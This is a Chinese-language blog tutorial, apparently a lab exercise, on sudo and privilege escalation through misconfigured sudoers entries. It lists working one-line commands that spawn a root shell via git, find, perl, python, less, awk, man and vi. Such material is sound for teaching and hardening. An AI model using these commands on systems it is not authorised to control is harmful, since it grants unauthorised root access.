文章介绍了Linux系统中sudo命令的用途,允许普通用户执行root命令以降低管理员风险。然而,文中探讨了多种利用sudo权限配置进行提权的方法,如通过git、find、perl、python、less、awk、man和vi等工具,这些潜在的安全漏洞可能被恶意用户利用以获取root权限。
sudo简介:sudo是linux系统的管理命令,其允许系统管理员让普通用户执行一些或者全部的root命令。这样可以减少root用户的登陆。sudo权限的配置文件位于/etc/sudoers,当普通用户使用sudo命令时,linux系统会在sudoers文件中查找当前用户,根据当前用户权限配置来决定是否可以运行相关命令。权限配置的格式如下:
实验环境准备,对sudoers文件进行如下配置,其中ljj是普通用户
利用git来进行提权,输入sudo git help config,然后输入!/bin/bash即可成功切换为root用户
sudo git help config
!/bin/bash
利用find来提权:sudo find anyfile -exec /bin/bash \;
利用perl提权:sudo perl -e 'exec "/bin/bash";'
利用python提权:sudo python -c 'import pty;pty.spawn("/bin/bash")'
利用less提权:输入sudo less /etc/hosts浏览文件内容时,在底部输入!bash可切换到root权限的shell
利用awk提权:通过调用linux的system函数来打开bash
利用man提权:通过sudo man man命令打开man使用手册,同时会进入编辑行,输入!bash回车即可获得root权限
利用vi提权:通过sudo vi会进入默认页,输入:!bash回车即可获得root权限
扫一扫
1393
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
